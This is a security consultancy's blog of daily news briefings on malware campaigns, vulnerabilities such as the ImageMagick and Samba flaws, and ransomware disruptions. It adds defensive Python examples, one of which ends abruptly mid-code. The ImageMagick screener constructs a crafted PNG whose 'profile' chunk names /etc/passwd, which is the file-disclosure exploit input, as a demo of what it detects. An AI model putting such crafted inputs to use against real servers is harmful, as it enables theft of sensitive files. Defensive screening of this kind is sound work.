Les Bell and Associates Pty Ltd
Site blog
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
Google Search Returns Malicious Loaders for Malware Attacks
Researchers at SentinelLabs have identified a series of virtualized .NET malware loaders which are being distributed via malicious ads placed through Google and displayed in search results. The researchers encountered these loaders while investigating malvertising attacks; all that was required was a simple Google search for "Blender 3D" and the ads were returned.
The loaders are implemented in .NET and use virtualization, based on the KoiVM virtualizing protector, to obfuscate their implementation and execution. Although SentinelLabs dubbed these loaders MalVirt, it seems likely that they are related to the KoiVM loader detected a few months ago by K7 Security Labs. The MalVirt malware applies an unusual level of anti-analysis and anti-detection techniques to its payloads, which include a feature-rich infostealer from the Formbook family that is capable of keylogging, screenshot theft, theft of web and other credentials and staging of other malware.
The Formbook malware is more commonly delivered as malmail attachments; switching to malverts is a response to the default blocking of MS Office VBA (Visual Basic for Applications) macros. While popular with criminal groups, it has also been used by state-affiliated groups, as reported by Ukraine's CERT.
Milenkoski, Aleksandar and Tom Hegel, MalVirt | .NET Virtualization Thrives in Malvertising Attacks, blog post, 2 February 2023. Available online at https://www.sentinelone.com/labs/malvirt-net-virtualization-thrives-in-malvertising-attacks/.
Threat Actors Use Visual Studio Tools for Office to Deploy Malware
There are many other responses to Microsoft's default blocking of VBA macros: wrapping them in .ZIP and similar archives, or even .ISO images, so that the wrapper would carry the Mark of the Web, but the macro would not, or using shortcut (.LNK) files. Now, Deep Instinct researchers have uncovered a new technique: using Microsoft's Visual Studio Tools for Office (VSTO) to develop Office Add-Ins.
VSTO allows these Office application extensions to be written using .NET, and also enables the creation of Office documents which will deliver and execute them. Even better, an Office Add-In can be associated with a specific Office application and once it is installed, the Add-In will load and execute every time that application is launched - no need for persistence workarounds like creating scheduled tasks!
A VSTO Add-In can be packaged along with the Office document used to run it, but can also be fetched from a remote host when the document is opened. The latter technique is more difficult for the attacker; they would have to sign the Add-In using a trusted certificate, for example. The Deep Instinct researchers provide a proof-of-concept which can deliver a Meterpreter payload.
Vilkomir-Preisman, Shaul, No Macro? No Worries. VSTO Being Weaponized by Threat Actors, blog post, 2 February 2023. Available online at https://www.deepinstinct.com/blog/no-macro-no-worries-vsto-being-weaponized-by-threat-actors.
Traffic Light Control Software Vulnerable; Could Cause Gridlock
Last week's eight industrial control systems advisories from the Cybersecurity & Infrastructure Security Agency were mostly routine, but one has caused more than the usual level of activity, largely because of the (lack of) response from the vendor concerned. According to a report in The Stack, Econolite's traffic light controller software carries a critical vulnerability (CVE-2023-0452) with a CVSS score of 9.8. The vulnerability relates to CWE-328: Use of Weak Hash, and - you guessed it - it's our old friend MD5 again, turning up where it shouldn't: an authentication subsystem. In fact, this can lead to unauthenticated access to a configuration file.
According to the report, the Econolite software is used by over 400 agencies to control lights at over 57,000 intersections, although not all are Internet-accessible. Even with access, an attacker can really only adjust the timing on the lights, prioritizing traffic in one direction and causing long tailbacks in the other; fortunately it is apparently not possible to turn all lights green simultaneously.
The biggest concern, however, is that Econolite has not responded in any way to the CISA advisory and has not released a patch for the problem, unlike the firms behind the other seven vulnerabilities of the week.
Targett, Ed, Critical controller bug could trigger traffic chaos: Software vendor ignores CISA outreach, The Stack, 27 January 2023. Available online at https://thestack.technology/econolite-traffic-controller-vulnerability-cisa-ics/.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
ESET Releases APT Activity Report for 2022
Security software and services firm ESET has released its APT Activity Report T3 2022, covering the last three months of the year. The report summarises the campaigns of threat actors affiliated with several states: China, Iran, North Korea and Russia (not that one should imagine for a moment that other countries don't have similar groups).
Not unexpectedly, the primary target of Russian-linked groups was Ukraine, against which they deployed an array of wipers and ransomware - for example, the notorious Sandworm group reappeared, this time with a new wiper targeting the Ukrainian energy sector (always a favourite Russian target in winter - it was also the target of Russian missile attacks this time).
Meanwhile, the Pandas - the China-aligned groups - seemed to shift their focus even more towards Europe, although some groups such as LuckyMouse and MirrorFace are continuing to target the S.E. Asian region, hitting companies in Hong Kong and also running a spearphishing campaign against Japanese political entities. The Iranian groups were more concerned with the Middle East, of course - primarily Israel and Israeli companies' overseas operations.
North Korean APTs are focused on financial rewards, targeting cryptocurrency firms and exchanges - a useful workaround for a country beset by financial sanctions.
The report provides a useful technical overview of the various campaigns with lots of links to more detailed reports, along with lists of targeted countries and regions, as well as industry sectors.
Boutin, Jean-Ian, ESET APT Activity Report T3 2022, blog post, 31 January 2023. Available online at https://www.welivesecurity.com/2023/01/31/eset-apt-activity-report-t3-2022/.
ImageMagick Vulns Lead to DoS, Arbitrary File Disclosure
One of the all-time-great secret tools of command line ninjas is the ImageMagick program suite, which can be used from the command line to convert graphic file formats and resize images without a whole lot of mousing around. The command-line nature of the ImageMagick convert utility means that it is often used on web servers to downsize uploaded high-resolution images 'on the fly', so as to not waste bandwidth for viewers who will only see a smaller version on the final page anyway.
Now comes the disclosure of two 0day vulnerabilities discovered by Mexican security firm Metabase Q:
- CVE-2022-44267 - A DoS vulnerability triggered when parsing a PNG image with a filename consisting of a single dash ("-")
- CVE-2022-44268 - An information disclosure vulnerability that could be exploited to read arbitrary files from a server when parsing an image
Like many command-line utilities, the ImageMagick programs will interpret a filename argument of '-' as a reference to the standard input stream (stdin), rather than an actual file (in *ix systems, files and devices are treated the same way anyway). Since web site image processing is usually based on actual files, there will be no data on stdin, and the process will block, waiting for input. Of course, that will affect only that thread or process, rather than the entire web server or system, but if that '-' was embedded on every page . . .
The second vulnerability could be more severe; it abuses the structure of a PNG file to get ImageMagick to read and incorporate an arbitrary file into the output image. Metabase Q's proof-of-concept, for example, retrieves the content of /etc/passwd, which could conceivably enumerate some user and system accounts, although it would have to be a really old system to contain password hashes. But other files, some considerably more sensitive, could be retrieved this way.
The vulnerabilities exist in ImageMagick versions up to and including 7.1.0-49; they were fixed in version 7.1.0-52, which was released in November 2022 and should have percolated through repositories by now and have been updated by switched-on site admins. I'll still be using my updated ImageMagick.
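A pre-flight screen for an upload pipeline that hands files to convert, added here as an example and not code from the Metabase Q write-up or from ImageMagick: it rejects the stdin filename behind CVE-2022-44267 and walks the PNG chunk structure (verifying CRCs) to flag textual chunks whose keyword is "profile", the mechanism Metabase Q's PoC uses for CVE-2022-44268. The PNG bytes are constructed inline; patching ImageMagick remains the real fix.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
TEXT_CHUNKS = (b"tEXt", b"zTXt", b"iTXt")


def make_chunk(ctype, payload):
    """Serialise one PNG chunk: length, type, payload, CRC-32 over type+payload."""
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


def build_png(text_chunks=()):
    """Constructed 1x1 greyscale PNG with optional (keyword, text) tEXt chunks."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)  # 1x1, 8-bit grey
    idat = zlib.compress(b"\x00\x00")  # one filter byte + one grey pixel
    body = make_chunk(b"IHDR", ihdr) + make_chunk(b"IDAT", idat)
    for keyword, text in text_chunks:
        payload = keyword.encode("latin-1") + b"\x00" + text.encode("latin-1")
        body += make_chunk(b"tEXt", payload)
    return PNG_SIGNATURE + body + make_chunk(b"IEND", b"")


def iter_chunks(data):
    """Yield (type, payload) per chunk; reject a bad signature, truncation or CRC."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIGNATURE)
    while pos < len(data):
        if pos + 8 > len(data):
            raise ValueError("truncated chunk header")
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        start, end = pos + 8, pos + 8 + length
        if end + 4 > len(data):
            raise ValueError("truncated chunk body")
        payload = data[start:end]
        (crc,) = struct.unpack(">I", data[end:end + 4])
        if zlib.crc32(ctype + payload) & 0xFFFFFFFF != crc:
            raise ValueError("CRC mismatch in %s chunk" % ctype.decode("latin-1"))
        yield ctype, payload
        pos = end + 4
        if ctype == b"IEND":
            break


def chunk_keyword(payload):
    """tEXt, zTXt and iTXt all begin with a Latin-1 keyword terminated by NUL."""
    keyword, sep, _rest = payload.partition(b"\x00")
    return keyword.decode("latin-1") if sep else None


def screen_upload(filename, data):
    """Return reasons to reject the upload before it is passed to 'convert'."""
    findings = []
    # CVE-2022-44267: '-' means stdin to ImageMagick; with nothing on stdin the
    # worker blocks indefinitely.
    if filename == "-":
        findings.append("stdin-filename")
    # CVE-2022-44268: a textual chunk whose keyword is 'profile' names a server
    # file that vulnerable versions read and embed in the output image.
    for ctype, payload in iter_chunks(data):
        if ctype in TEXT_CHUNKS and (chunk_keyword(payload) or "").lower() == "profile":
            findings.append("profile-chunk")
    return findings


if __name__ == "__main__":
    poc = build_png([("profile", "/etc/passwd")])
    print(screen_upload("avatar.png", poc))  # ['profile-chunk']
```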
Gonzales, Bryan, ImageMagick: The hidden vulnerability behind your online images, blog post, undated. Available online at https://www.metabaseq.com/imagemagick-zero-days/.
Google Expands Fuzzer Reward Program
Since 2017, Google has run an OSS-Fuzz Reward Program to encourage the use of fuzz testing in the open source community. Lest you think this is an obscure little corner of software testing, let me point out there is money in it: the OSS-Fuzz Reward Program has awarded over $US600,000 to over 65 different contributors for their assistance.
Now, Google has announced many new types of rewards which expand the scope of the program, covering contributions such as integration of new sanitizers to find new vulnerabilities, notable FuzzBench integrations, and project fuzzing coverage increase. The total possible rewards for a project integration has increased by 50% to $US30,000, depending on the criticality of the project.
The firm has also continued to add new language support and tools to the OpenSSF FuzzIntrospector tool, which was integrated into OSS-Fuzz last year.
Chang, Oliver, Taking the next step: OSS-Fuzz in 2023, blog post, 1 February 2023. Available online at https://security.googleblog.com/2023/02/taking-next-step-oss-fuzz-in-2023.html.
OpenAI Escalates Arms Race With Itself
Your humble scribe counts himself lucky to have retired from academia just as artificial intelligence tools like ChatGPT have made it possible for students to submit realistic essays that were not written by the student himself (nor by a for-hire essay-writing service). Detecting automated plagiarism of this kind can be quite tricky; those who have played with ChatGPT - which must be all of us, by now - know that its output reads easily, although a sequence of conversations will reveal a certain underlying structure that never varies.
The main drawback of ChatGPT is the fact that it was pre-trained in 2021 and is not aware of developments since then. It also has a nasty characteristic that is a dead giveaway: it will cite non-existent papers and will confess, when pushed, that it lied. Given time, though, both of these will be overcome. But even in the meantime, it will take a human marker far longer to investigate possible plagiarism than a student would do in creating it. How, then, to detect AI-written submissions?
OpenAI to the rescue! The firm has, inevitably, trained a classifier to distinguish between human-written and AI-generated text from a variety of providers. It's not very good yet; in testing it accurately categorized 26% of AI-written text as "likely AI-written" but incorrectly categorized 9% of human-written text as being the work of an AI (false positives). However, this represents a significant improvement over the previous classifier.
Of course, the classifier has to be trained on a corpus consisting of pairs of AI- and human-written text on the same topic; something that is expensive to arrange, especially on some topic areas, and could conceivably be gamed to bias the classifier. And reliability will be much lower when applied to topics that the classifier has not been trained on.
It was inevitable that one solution to a problem posed by AI would be AI, even if this puts OpenAI into an arms race with itself. But at least the firm is engaging with educators and others to discuss these problems, via a feedback form and other resources.
Kirchner, Jan Hendrik, Lama Ahmad, Scott Aaronson and Jan Leike, New AI classifier for indicating AI-written text, blog post, 31 January 2023. Available online at https://openai.com/blog/new-ai-classifier-for-indicating-ai-written-text/.
More Baseboard Management Controller Vulns Threaten Server Supplies
Last month we wrote about vulnerabilities in the AMI MegaRAC Baseboard Management Controller software, posing a risk to servers from many manufacturers including DELL EMC, HP Enterprise, and Lenovo. Now security firm Eclypsium, who found and disclosed three vulnerabilities, has updated its advisory to add two new vulnerabilities which it had not disclosed, in order to allow AMI to develop mitigations.
The new vulnerabilities are:
- CVE-2022-26872 (CVSS score: 8.3) - Password reset interception via API
- CVE-2022-40258 (CVSS score: 5.3) - Weak password hashes for Redfish and API
The AMI security advisory is somewhat uninformative, but NVD classifies the first vulnerability as a weak password recovery mechanism for forgotten passwords, while the second seems to relate to the use of weak hashing algorithms - specifically, MD5 with a single global salt. Customers should check with their server vendors to see whether they have released an update to address these issues - several already have.
Babkin, Vlad, Supply Chain Vulnerabilities Put Server Ecosystem at Risk, blog post, 5 December 2022. Available online at https://eclypsium.com/2022/12/05/supply-chain-vulnerabilities-put-server-ecosystem-at-risk/.
VBA Macros Install Monero Cryptominer
A new report from Fortiguard Labs researcher Xiaopeng Zhang explains how an unidentified threat actor is using malicious Visual Basic for Applications (VBA) macros to install the ever-popular XMRig cryptominer, hijacking the victim's computer to mine Monero cryptocurrency.
Three different Excel documents were discovered, each of which carries a VBA project which, when the spreadsheet is opened, will cause Excel to pop up the usual security warning about macros having been disabled. Of course, we all know what many users will do in response to this: they will click the "Enable Content" button. The spreadsheet in fact encourages this through a nice trick: it displays a blurred graphic, tricking the user into thinking the image will clear if the content is enabled.
Once the VBA code is running, it downloads a binary executable from a C2 server, saving it to the system Templates folder and renaming it before executing it. Like the VBA code itself, this binary is obfuscated, but deobfuscation reveals it to be a .Net executable which, in turn, carries a gzip-compressed .Net DLL. This is extracted in memory and then loaded, before being executed. This code is also extensively obfuscated and also contains functions to detect tampering at runtime, making it very difficult to analyse, but the code is a malware loader and installer, with the payload in the .Net module.
The next stage is to gain persistence, which is done by creating a task in TaskScheduler, before loading and decoding its configuration block and initiating communication with the C2 server. After uploading information gathered from the victim system - CPU type, current user name, etc. - the malware receives commands, typically to download further files from Microsoft OneDrive. The first of these is used to perform process hollowing, replacing the code of an innocuous-looking AddInProcess.exe with the content of the second, which is the xmrig.exe cryptominer.
It is a long and convoluted process, most of which is intended to obscure the nature of the attack and prevent analysis.
Zhang, Xiaopeng, Analyzing Malware Code that Cryptojacks System to Mine for Monero Crypto, blog post, 31 January 2023. Available online at https://www.fortinet.com/blog/threat-research/malicious-code-cryptojacks-device-to-mine-for-monero-crypto.
KeePass Vulnerability Allows Plaintext Export of Entire Password Database
Many security professionals use the KeePass open-source password manager - it is free, lightweight and versatile, while not exposing a large attack surface. However, a newly-revealed vulnerability (CVE-2023-24055) suggests that some caution might be necessary, at least until a fix or workaround appears.
KeePass is configured by the KeePass.config.xml file in the program directory. If an attacker can edit this file, they can add a trigger which will export the password database when it is initially opened, without the user being asked to confirm this - it will happen invisibly in the background. The view of the KeePass developers is that if an attacker has that level of access to the machine, it is game over already - but our view is that this represents a significant privilege escalation which will gain the attacker access to many other systems.
One suggestion is to use "Tools" -> "Options" -> "Policy" and then deselect "Export - No Key Repeat", but the same argument makes this suggestion moot: an attacker who has that level of access to the machine can disable that setting and execute the attack. Perhaps the best approach for the time being, especially for those who must allow others access to a shared system, is to run the Portable version of KeePass off a USB key. A write-protected KeePass.config.enforced.xml file is another option. But in all these cases, a sophisticated attack can bypass these measures.
With PoC code now available, expect a KeePass database export feature to be added to many infostealers.
Chris, If an attacker modifies the xml config file . . ., discussion thread, 28 December 2022. Available online at https://sourceforge.net/p/keepass/discussion/329220/thread/a146e5cf6b/.
QNAP Pushes Update to Fix SQL Injection Remote Code Execution Vulnerability
NAS vendor QNAP has warned customers to update their devices' firmware in order to fix a critical remote code execution vulnerability (CVE-2022-27596). The vulnerability, which has a CVSS 3.1 score of 9.8, seems to relate to improper sanitization of special elements in SQL (CWE-89).
Users are urged to update to QTS 5.0.1.2234 build 20221201 or later (5.0.1.2248 seems to be current) or QuTS hero h5.0.1.2248 build 20221215 or later. Most users who have automatic firmware update checks enabled and log in to their devices regularly will already have updated, so this is mainly a reminder for those who let the months go by, lulled into a tranquil state by the reliability of NAS devices in typical SME settings.
Uncredited, Vulnerability in QTS and QuTS hero, security advisory, 30 January 2023. Available online at https://www.qnap.com/en/security-advisory/qsa-23-01.
Microsoft Reminds Sleepy Exchange Admins: Patch!
In a similar vein, Microsoft's Exchange Team has blogged, reminding admins that it is critical to keep Exchange servers updated; this shouldn't really be necessary, as Exchange has proved to be fertile ground for attackers in recent years - remember ProxyShell, ProxyNotShell, ProxyOracle and all the rest? - and Exchange admins really ought to be in a permanently paranoid and jittery state.
As Redmond's reminder points out, this means installing the latest available Cumulative Update (CU) and Security Update (SU) on all Exchange servers as well as on Exchange Management Tools workstations. The problem is that email access is so critical in an always-connected, 24 x 7 x 52 world that admins find it hard to schedule even brief downtime.
Additional Exchange controls are a good idea, including enabling Windows Extended Protection, which mitigates MitM attacks, as well as enabling certificate signing of PowerShell serialization payloads. Attackers love to use PowerShell in Exchange attacks, especially for exploiting Active Directory. The blog post provides lots of other useful tips.
The Exchange Team, Protect Your Exchange Servers, blog post, 26 January 2023. Available online at https://techcommunity.microsoft.com/t5/exchange-team-blog/protect-your-exchange-servers/ba-p/3726001.
MD5 Lives On To Bite Samba Users
An interesting article by Paul Ducklin for Sophos' Naked Security blog makes a plea for cryptographic agility - the somewhat obvious idea that we must be willing to abandon old cryptoprimitives as they prove weak. This is an especially important notion given the possibility that someone, somewhere - who will never let on that they have it, for obvious reasons - builds a quantum computer that is able to break the most popular public-key cryptoprimitives.
That day does not seem to be upon us quite yet, but older algorithms are vulnerable to attacks using classical computer hardware, especially GPU's, and a leading example is the birthday paradox attack on the older hash algorithms, such as MD5. The complexity of a birthday paradox attack is \(2^{n/2}\) operations, where \(n\) is the length of the digest, in bits.
Now, MD5 produces a 128-bit digest, which means that a birthday paradox attack can be achieved in only \(2^{64}\) - or approximately \(1.85 \times 10^{19}\) - attempts. This might seem like a large number, but it's not - and it can be cut down massively using a technique called a chosen-prefix collision, which works by making slight changes to initially-identical strings to quickly find two different strings which still produce the same digest value. This process takes only seconds.
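Where the \(2^{n/2}\) figure comes from, as an added worked derivation that is not part of the original brief. With \(N = 2^n\) equally likely digest values, the probability that \(k\) randomly chosen messages all have distinct digests is

\[
P(\text{no collision}) = \prod_{i=1}^{k-1}\left(1 - \frac{i}{N}\right) \approx \exp\!\left(-\frac{k^2}{2N}\right),
\]

so the collision probability reaches \(1/2\) when \(k^2/(2N) = \ln 2\), that is

\[
k \approx \sqrt{2 \ln 2 \cdot N} \approx 1.18\sqrt{N} = 1.18 \cdot 2^{n/2}.
\]

For MD5, \(n = 128\) gives \(k \approx 1.18 \cdot 2^{64} \approx 2.2 \times 10^{19}\) messages, which is the \(2^{64}\) figure above up to a small constant; chosen-prefix collision methods then reduce the work far below even this bound.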
Some authentication code in Samba is a holdover from the days of Windows 2000, when Microsoft introduced the use of RC4 encryption with an MD5 HMAC (hash-based message authentication code). The vulnerability arises from the use of a single round of MD5 to compute a digest over the data to be authenticated before calculating the HMAC over that; an attacker who knows the plaintext data can create another set of plaintext which will generate the same digest value, and insert that into the data stream without being detected. Somebody probably inserted this extra digest calculation in an attempt to improve authentication security, not realising that it actually weakened the protocol.
Since most systems have this old HMAC-MD5 authentication disabled, it was never detected as a serious problem, but attackers could negotiate the authentication protocol down and make use of this - hence CVE-2022-38023, which was fixed by Microsoft in November last year, and which could allow an attacker to insert malicious packets into the SMB protocol and achieve a privilege escalation attack. The whole sad tale is a lesson that keeping old versions of protocols around for backward compatibility can lead to disaster (which is why it is so important to configure web servers to not allow the older versions of the TLS and SSL protocols).
Ducklin, Paul, Serious Security: The Samba logon bug caused by outdated crypto, blog post, 30 January 2023. Available online at https://nakedsecurity.sophos.com/2023/01/30/serious-security-the-samba-logon-bug-caused-by-outdated-crypto/.
Stevens, Marc, Arjen Lenstra and Benne de Weger, Vulnerability of software integrity and code signing applications to chosen-prefix collisions for MD5, web page, 30 November 2007. Available online at https://www.win.tue.nl/hashclash/SoftIntCodeSign/.
IAPP Report Highlights Challenges for Responsible Use of AI
The latest Privacy and AI Governance Report from the International Association of Privacy Professionals (IAPP) explores the state of artificial intelligence (AI) governance through interviews with stakeholders in the tech, life sciences, telecommunications, banking, staffing and retail industries in North America, Europe and Asia. The interviews focused on where the stakeholders' organizations stood on five areas: governance, risk, processes, tools and skills.
The results show that formulating and deploying clear governance guidelines for the responsible use of AI is a challenging and complex task; the most mature organizations have rolled out responsible practices, but constitute only 20% of organizations surveyed. 10% of responding organizations have not yet formulated responsible AI guidelines, with the remainder either in the process of including responsible AI in their governance or 'about to start' doing so.
The use of AI exposes enterprises to a whole new risk landscape. Perhaps the most obvious risk is bias in AI which results in harm to individuals, with consequent fines and judgements. This is further complicated by the changing regulatory environment, which has led to a lack of legal clarity surrounding the use of AI systems.
However, in 80% of organizations, guidelines for ethical use of AI consist only of high-level policy statements and strategic objectives, with no clear plan for how these can be achieved. While some tools do exist for addressing privacy and ethical risks of AI, the selection of these is difficult, as the field is rapidly evolving and lacks robust concepts and definitions.
Koerner, Katharina, and Jake Frazier, Privacy and AI Governance Report, International Association of Privacy Professionals, January 2023. Available online at https://iapp.org/media/pdf/resource_center/privacy_ai_governance_report.pdf.
DOJ Disrupts Hive Ransomware Variant
The US Department of Justice has revealed that, since July 2022, the FBI has penetrated the networks of the Hive ransomware group, captured its decryption keys and offered them to over 1,300 victims worldwide, so that they were spared paying up to $US130 million in ransoms. It also announced that, in coordination with German law enforcement (the German Federal Criminal Police and Reutlingen Police Headquarters-CID Esslingen) and the Netherlands National High Tech Crime Unit, it has seized control of the servers and websites that Hive uses to communicate with its members, disrupting Hive's ability to attack and extort victims.
Like many other ransomware developers, the Hive group offered ransomware-as-a-service (RaaS). The core group maintained the core software as well as the web infrastructure for C2 and payment processing, while recruiting affiliates who would perform initial compromise and deployment in exchange for 80% of the proceeds. The Hive developers also operated the Hive Leak Site, which would publish data exfiltrated from victims who refused to pay the extortion demand.
Uncredited, U.S. Department of Justice Disrupts Hive Ransomware Variant, press release, 26 January 2023. Available online at https://www.justice.gov/opa/pr/us-department-justice-disrupts-hive-ransomware-variant.
Mimic Ransomware Uses Old Conti Code, Everything DLL API
Researchers from Trend Micro have discovered and analysed a new piece of ransomware which is partly based on old code from the Conti ransomware, as well as abusing the API's of a Windows local search engine tool called Everything. The new ransomware, christened Mimic, targets Russian and English-speaking users.
Analysis shows that Mimic is deployed as a dropper which unpacks several files, including a 7zip executable which is used to extract the malware payload from a password-protected archive called Everything64.dll - the genuine Everything search functionality is in Everything32.dll. After extracting its files, it copies them to a random directory under %LocalAppData% and renames the ransomware binary to bestplacetolive.exe.
Mimic seems to be highly capable; it can bypass UAC, disable Windows Defender, prevent system shutdown, prevent itself being killed, disable Windows telemetry, disable sleep mode, terminate multiple applications and services, and delete shadow copies. As it runs, it queries the Everything_SetSearchW() function to selectively match or avoid files for encryption, and it adds a .QUIETPLACE extension to the files that it encrypts.
Trend Micro's report includes suggested mitigations, as well as IoC's.
Morales, Nathaniel, Earle Maui Earnshaw, Don Ovid Ladores, Nick Dai and Nathaniel Gregory Ragasa, New Mimic Ransomware Abuses Everything APIs for its Encryption Process, blog post, 26 January 2023. Available online at https://www.trendmicro.com/en_us/research/23/a/new-mimic-ransomware-abuses-everything-apis-for-its-encryption-p.html.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
News Stories
Software Supply Chain Poisoned By Phishing Campaigns
Research performed jointly by application security testing firm Checkmarx and open-source supply chain security firm Illustria has brought to light a massive campaign which targets naive end users with malicious packages whose descriptions link to phishing sites. The threat actors behind the campaign, which appears to be highly automated, published over 144,000 packages to the NuGet, NPM and PyPI repositories - the vast majority to NuGet.
The package names mostly relate to hacking, cheats and free resources, for example "free-steam-codes-generator" and "yalla-ludo-diamond-hack"; victims were also promised increased social media followers or likes. Every package description contained links to phishing sites - perhaps an attempt to boost the phishing sites' search engine ranking by linking to them from reputable domains such as NuGet's.
Over 65,000 unique URLs across 90 domains were used to host realistic, well-designed web pages, some even including fake interactive chatbots that appeared to be delivering the cheats. Generally, though, victims were asked to complete a 'human verification' process that led them through a maze of sites asking social engineering questions, before finally redirecting them to legitimate e-commerce sites with referral IDs - so that if the victim makes a purchase, the threat actors earn a commission.
Harush, Jossef, How 140k NuGet, NPM, and PyPi Packages Were Used to Spread Phishing Links, blog post, 14 December 2022. Available online at https://checkmarx.com/blog/how-140k-nuget-npm-and-pypi-packages-were-used-to-spread-phishing-links/.
Microsoft Reclassifies SPNEGO Vuln as Critical - Patch Now
SPNEGO is the Simple and Protected GSS-API Negotiation Mechanism (RFC 4178) - part of the 'plumbing' around Active Directory, Kerberos and similar authentication protocols that lets a client and server negotiate which security mechanism to use. In the Windows world it is used by application protocols such as SMB (Server Message Block) and RDP (Remote Desktop Protocol), among others, to select an authentication mechanism from those supported by both sides; the vulnerable component is NEGOEX, the SPNEGO Extended Negotiation security mechanism.
Also in the Windows world, it is the subject of a vulnerability which Microsoft patched back in September 2022. At that point, CVE-2022-37958 was categorised as an information disclosure vulnerability. However, IBM X-Force Red security researcher Valentina Palmiotti discovered that the vulnerability could allow unauthenticated attackers to remotely execute code - and since SPNEGO sits beneath several application protocols, the exposure is not limited to a single service.
Successful exploitation might require multiple attempts, so the CVSS Attack Complexity metric rates as High; with every other base metric at its worst value, the overall CVSS base score is 8.1, and Microsoft has reclassified the vulnerability as 'Critical'. In order to give users time to patch, IBM will not release full technical details until at least April 2023.
Thompson, Chris, Critical Remote Code Execution Vulnerability in SPNEGO Extended Negotiation Security Mechanism, IBM Security Intelligence blog, 13 December 2022. Available online at https://securityintelligence.com/posts/critical-remote-code-execution-vulnerability-spnego-extended-negotiation-security-mechanism/.
GitHub Requires 2FA From March 2023
During 2023 GitHub will gradually roll out a requirement for developers to use two-factor authentication (2FA). Over the year, distinct groups of users will be required to enable 2FA; the gradual rollout will allow GitHub to make adjustments before larger groups are enrolled later in the year.
The exact criteria GitHub will use to assign users to these groups will not be made public, but broadly they are:
- Users who published GitHub or OAuth apps or packages
- Users who created a release
- Users who are Enterprise and Organization administrators
- Users who contributed code to repositories deemed critical by npm, OpenSSF, PyPI, or RubyGems
- Users who contributed code to the approximate top four million public and private repositories
Users will start receiving reminders 45 days before their 2FA deadline; once the deadline passes they will have a further week to enrol, after which they will be blocked from accessing GitHub until 2FA is enabled.
Swanson, John, Raising the bar for software security: next steps for GitHub.com 2FA, blog post, 14 December 2022. Available online at https://github.blog/2022-12-14-raising-the-bar-for-software-security-next-steps-for-github-com-2fa/.
Examples of Cloud Credential Abuse
A short article from Palo Alto Networks' Unit 42 provides a couple of examples of how attackers are able to leverage stolen cloud service API credentials to pursue objectives such as phishing, cryptomining and data theft.
Alon, Dror, Compromised Cloud Compute Credentials: Case Studies From the Wild, blog post, 8 December 2022. Available online at https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/.
Saturday Funny
No comment about the dangers of the Internet of Things is required; just see https://twitter.com/vxunderground/status/1603508551569252360. Shodan.io FTW!
Happy Holidays!
This will be the last security news headlines blog post for 2022, as we take a break for the holiday season. We'll be back in January, although we may post before then if there are any major news events. Until then, we wish all readers a happy holidays season!
News Stories
Atlassian Products Not Rotating Session Cookies
Just over a week ago, Bangalore-based threat intelligence firm CloudSEK discovered a breach of its systems which led to a small leak of customer information. At first, its investigation suggested that an employee's Jira password had been compromised in order to gain access to Confluence pages, but deeper investigation revealed details that are rather more concerning.
The threat actor did gain access to a CloudSEK employee's Jira account, but did so using Jira session cookies found in infostealer logs being sold on the dark web. Further investigation revealed that the session cookies of Atlassian products such as Jira, Confluence and Bitbucket are not invalidated when the password is changed - even with 2FA enabled - and remain valid for 30 days; they expire only at that time, or if the user logs out. A password change, or any other significant change to the account's authentication state, should rotate the session: the old cookie is invalidated and a new one issued.
The CloudSEK researchers have confirmed that this flaw can be used to take over Jira accounts at hundreds of companies: logs from over a million compromised computers, containing over 16,000 Jira cookies, are currently for sale on dark web marketplaces. The company has released a free tool which lets companies check whether their accounts are being advertised on dark web marketplaces; they have also notified Atlassian, who have acknowledged the issue and are working to resolve it.
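The fix Atlassian needed is a common one, and worth seeing in miniature. The following is an added example, not CloudSEK's or Atlassian's code: each user record carries an authentication 'generation' counter that is bumped on a password change (or any other change to the account's authentication state), and every session records the generation it was issued under, so a cookie stolen before the change fails validation afterwards. The 30-day absolute lifetime comes from the story; the user, the passwords and the controllable clock are constructed for the demo, and PBKDF2 is simply the password hash chosen for this illustration.

```python
"""Session revocation on credential change.
Added example for this article; not CloudSEK's or Atlassian's code."""
import hashlib
import os
import secrets
import time
from typing import Callable, Dict, Optional, Tuple

SESSION_TTL = 30 * 24 * 3600   # 30-day absolute lifetime, as described for Atlassian's cookies


class User:
    def __init__(self, name: str, password: str) -> None:
        self.name = name
        self.auth_generation = 0        # bumped whenever the account's authentication state changes
        self._set_password(password)

    def _set_password(self, password: str) -> None:
        self.salt = os.urandom(16)      # PBKDF2 chosen for this illustration; any proper password hash will do
        self.pw_hash = hashlib.pbkdf2_hmac("sha256", password.encode(), self.salt, 200_000)

    def check_password(self, password: str) -> bool:
        candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), self.salt, 200_000)
        return secrets.compare_digest(candidate, self.pw_hash)

    def change_password(self, new_password: str) -> None:
        self._set_password(new_password)
        self.auth_generation += 1       # every session issued before this moment is now dead


class SessionStore:
    """bind_to_generation=False reproduces the weak behaviour: cookies outlive a password change."""

    def __init__(self, bind_to_generation: bool, clock: Callable[[], float] = time.time) -> None:
        self.bind = bind_to_generation
        self.clock = clock
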